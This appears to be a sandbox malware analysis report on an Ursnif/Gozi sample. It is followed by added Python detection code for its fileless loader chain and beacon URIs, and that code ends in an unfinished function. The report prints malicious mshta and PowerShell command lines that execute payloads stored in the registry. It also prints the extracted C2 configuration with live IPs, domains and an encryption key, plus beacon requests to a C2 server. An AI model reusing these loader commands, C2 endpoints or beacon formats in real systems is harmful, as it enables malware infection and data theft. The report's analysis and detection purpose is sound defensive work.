

Windows Analysis Report
bf.exe

Overview

General Information

Sample Name: bf.exe
Analysis ID: 722154
MD5: b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1: 12b28a42e960dfc522348eba37b00ea74a0df527
SHA256: bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags: exegozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • bf.exe (PID: 1364 cmdline: C:\Users\user\Desktop\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
    • control.exe (PID: 4784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 5064 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3340 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
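The tree above is a registry-resident loader chain: mshta.exe runs an inline HTA that reads the TestLocal value under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E and evals it; that stage spawns powershell.exe, which aliases gp and iex, reads the UrlsReturn value from the same key and executes it; the PowerShell stage then compiles C# on the fly through csc.exe (the report's Sigma hit). Nothing in that chain touches a file except the csc.exe response file in %TEMP%. The following is an added example of detection logic over process-creation events, not part of the Joe Sandbox report: the PIDs, image paths and command lines are copied from the tree, while the parent PIDs of the two top-level processes, the benign control event and the four-field event schema are assumptions (Sysmon EID 1 or Security 4688 fields map onto it directly).

```python
"""Detection logic for the fileless Ursnif loader chain in the report's process tree
(mshta -> powershell -> csc.exe).

Added example, not part of the Joe Sandbox report. PIDs, images and command lines
are copied from the report; the parent PIDs of the two top-level processes (bf.exe,
mshta.exe) and the benign powershell event are constructed, and the four-field
event schema is an assumption (Sysmon EID 1 or Security 4688 map onto it directly).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# rule name -> (regex on image path, regex on command line); both must match.
RULES = {
    # mshta running an inline HTA that eval()s a registry value: the next stage lives
    # under HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, not on disk.
    "mshta_inline_hta_regread": (
        r"\\mshta\.exe$",
        r"about:<hta:application>.*\.regread\(",
    ),
    # powershell aliasing iex and then executing a value read from the registry.
    "powershell_alias_iex_registry": (
        r"\\powershell\.exe$",
        r"new-alias\s+.*-value\s+iex\b.*HKCU:",
    ),
    # csc.exe compiling a response file from %TEMP% (the report's Sigma hit).
    "csc_compile_from_temp": (
        r"\\csc\.exe$",
        r'@"?[^"]*\\AppData\\Local\\Temp\\[^"]*\.cmdline',
    ),
}
CHAIN = ("mshta_inline_hta_regread", "powershell_alias_iex_registry", "csc_compile_from_temp")


def detect(events):
    """Return {pid: [rule names]} for every flagged event.

    A csc.exe hit whose parent and grandparent were flagged as the powershell and
    mshta stages gets an extra 'chain:mshta>powershell>csc' entry. Any single rule
    can fire on admin tooling; the lineage is the high-confidence signal."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        names = [name for name, (img_re, cmd_re) in RULES.items()
                 if re.search(img_re, e.image, re.I) and re.search(cmd_re, e.cmdline, re.I)]
        if names:
            hits[e.pid] = sorted(names)
    for e in events:
        if CHAIN[2] not in hits.get(e.pid, []):
            continue
        parent = by_pid.get(e.ppid)
        grandparent = by_pid.get(parent.ppid) if parent else None
        if (parent and grandparent
                and CHAIN[1] in hits.get(parent.pid, [])
                and CHAIN[0] in hits.get(grandparent.pid, [])):
            hits[e.pid].append("chain:mshta>powershell>csc")
    return hits


# Events reconstructed from the report's process tree (ppid 1000 is a placeholder
# for the two processes whose parent the report does not show).
SAMPLE_EVENTS = [
    ProcEvent(1364, 1000, r"C:\Users\user\Desktop\bf.exe", r"C:\Users\user\Desktop\bf.exe"),
    ProcEvent(4784, 1364, r"C:\Windows\system32\control.exe", r"C:\Windows\system32\control.exe -h"),
    ProcEvent(5064, 1000, r"C:\Windows\System32\mshta.exe",
              r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    ProcEvent(4604, 5064, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    ProcEvent(5680, 4604, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6048, 4604, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'''C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline'''),
    ProcEvent(3340, 4604, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'''C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline'''),
    # constructed benign control: scripted powershell that must not fire
    ProcEvent(9001, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\scripts\backup.ps1'''),
]

if __name__ == "__main__":
    for pid, names in detect(SAMPLE_EVENTS).items():
        print(pid, names)
```

The lineage check is deliberately strict: a lone csc.exe compile from %TEMP% is common on developer machines, and PowerShell reading the registry is routine; the mshta-from-registry parent followed by an iex-from-registry child followed by an in-memory compile is not.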
Malware Configuration (Ursnif, extracted by the Malware Configuration Extractor):
{
  "RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=",
  "c2_domain": [
    "trackingg-protectioon.cdn1.mozilla.net",
    "45.8.158.104",
    "trackingg-protectioon.cdn1.mozilla.net",
    "188.127.224.114",
    "weiqeqwns.com",
    "wdeiqeqwns.com",
    "weiqeqwens.com",
    "weiqewqwns.com",
    "iujdhsndjfks.com"
  ],
  "botnet": "10103",
  "server": "50",
  "serpent_key": "AFRkxxddsKAnRl2J",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):

Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Author: unknown
  Strings:
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Author: unknown
  Strings:
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Author: unknown
  Strings:
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Author: unknown
  Strings:
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
(60 further memory-dump matches not shown)
Yara matches in unpacked PEs (Source, Rule, Description, Author):

Source: 0.3.bf.exe.13294a0.1.raw.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 0.3.bf.exe.12aa4a0.0.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 0.3.bf.exe.12aa4a0.0.raw.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 0.3.bf.exe.1355940.2.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 0.3.bf.exe.13294a0.1.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
(1 further unpacked-PE match not shown)

              Data Obfuscation

Sigma: Dot net compiler compiles file from suspicious location (Source: Process started, Author: Joe Security)
  Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
  CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 4604
  ParentProcessName: powershell.exe
  ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
  ProcessId: 6048
  ProcessName: csc.exe
Snort IDS alert
  Timestamp: 10/13/22-09:30:54.079674
  SID: 2033204
  Source: 192.168.2.5:49696, Destination: 45.8.158.104:80, Protocol: TCP
  Classtype: A Network Trojan was detected
Snort IDS alert
  Timestamp: 10/13/22-09:30:55.414317
  SID: 2033203
  Source: 192.168.2.5:49696, Destination: 45.8.158.104:80, Protocol: TCP
  Classtype: A Network Trojan was detected



              AV Detection

Source: bf.exe, Virustotal: Detection: 76%
Source: bf.exe, Avira: detected
Source: bf.exe, Joe Sandbox ML: detected
Source: 0.0.bf.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: bf.exe, Malware Configuration Extractor: Ursnif (full configuration listed above, after the process tree)
Source: bf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: ntdll.pdb, source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP, source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp

              Networking

Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49696 -> 45.8.158.104:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49696 -> 45.8.158.104:80
Source: Joe Sandbox View, ASN Name: ASBAXETNRU
Source: Joe Sandbox View, IP Address: 45.8.158.104
Source: global traffic, HTTP traffic detected:
  GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 45.8.158.104
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 45.8.158.104
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 45.8.158.104
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown, DNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net, reply code: Name error (3), i.e. NXDOMAIN; the hostname from the config did not resolve during analysis
Source: unknown, TCP traffic detected without corresponding DNS query: 45.8.158.104 (50 identical entries; the address is hard-coded in the c2_domain list of the extracted configuration, so no lookup precedes the connections)
Source: bf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsofU
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/
Source: explorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown, DNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
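The three GET requests above share the structure the two ET Snort rules key on: a fixed /uploaded/ prefix, a long base64-looking body in which '+' and '/' are escaped as _2B and _2F, '/' separators inserted at arbitrary offsets (in the second request one lands inside an escape, splitting it into "D_/2F"), and a short image-like extension. What that wrapping hides is ciphertext; the config's serpent_key is what would be needed to decrypt it (Serpent is a 128-bit block cipher, so the decoded length should be a multiple of 16). The following is an added example, not part of the Joe Sandbox report, that unwraps the three report paths back to base64 and ciphertext and applies that structural check as a detection; the three paths are copied from the report, the benign paths are constructed, and the '_2D' → '=' escape is an assumption that is not observed on this page. No decryption is attempted.

```python
"""Unwrap Ursnif/Gozi beacon URIs of the kind seen in the report's HTTP requests.

Added example, not part of the Joe Sandbox report. REPORT_PATHS are the three request
paths copied from the report; BENIGN_PATHS are constructed. '_2B' -> '+' and
'_2F' -> '/' are the escapes the report's ET "URI Struct M1 (_2B) / M2 (_2F)" rules
match on; '_2D' -> '=' is an assumption not observed on this page. The result is the
base64-decoded ciphertext only; decrypting it would need the serpent_key from the
extracted config and a Serpent implementation, which is not included here.
"""
import base64
import re
from urllib.parse import urlsplit

B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")
ESCAPES = {"_2B": "+", "_2F": "/", "_2D": "="}          # '_2D' is assumed, see docstring
SERPENT_BLOCK = 16                                       # Serpent: 128-bit block cipher
MSIE8_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"   # Yara string $a5

REPORT_PATHS = [
    "/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct",
    "/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct",
    "/uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct",
]
BENIGN_PATHS = ["/uploaded/report.pdf", "/images/logo.png", "/uploaded/a_2Bb.txt"]   # constructed


def unwrap_uri(path):
    """Strip the Ursnif wrapping from a request path.

    Returns (base64_text, ciphertext, escape_count), or None when the path does not
    have the '/uploaded/<wrapped base64>.<ext>' shape or does not decode."""
    m = re.fullmatch(r"/uploaded/(.+)\.([A-Za-z0-9]{2,5})", path)
    if not m:
        return None
    # Remove the '/' separators BEFORE undoing the escapes: the bot inserts them at
    # random offsets and in the report they split escapes ('guaMASEjD_/2Fwjtn').
    body = m.group(1).replace("/", "")
    escapes = 0
    for esc, ch in ESCAPES.items():
        escapes += body.count(esc)
        body = body.replace(esc, ch)
    if not set(body) <= B64_CHARS | {"="}:
        return None
    padded = body + "=" * (-len(body) % 4)      # the bot drops base64 padding
    try:
        ciphertext = base64.b64decode(padded, validate=True)
    except ValueError:                           # binascii.Error is a ValueError
        return None
    return body, ciphertext, escapes


def is_ursnif_beacon(url, user_agent=None):
    """Structural check: wrapped base64 under /uploaded/ with at least one escape and a
    decoded length that is a whole number of Serpent blocks. If a User-Agent is given
    it must also carry the MSIE 8.0 prefix the Yara rule matched in memory."""
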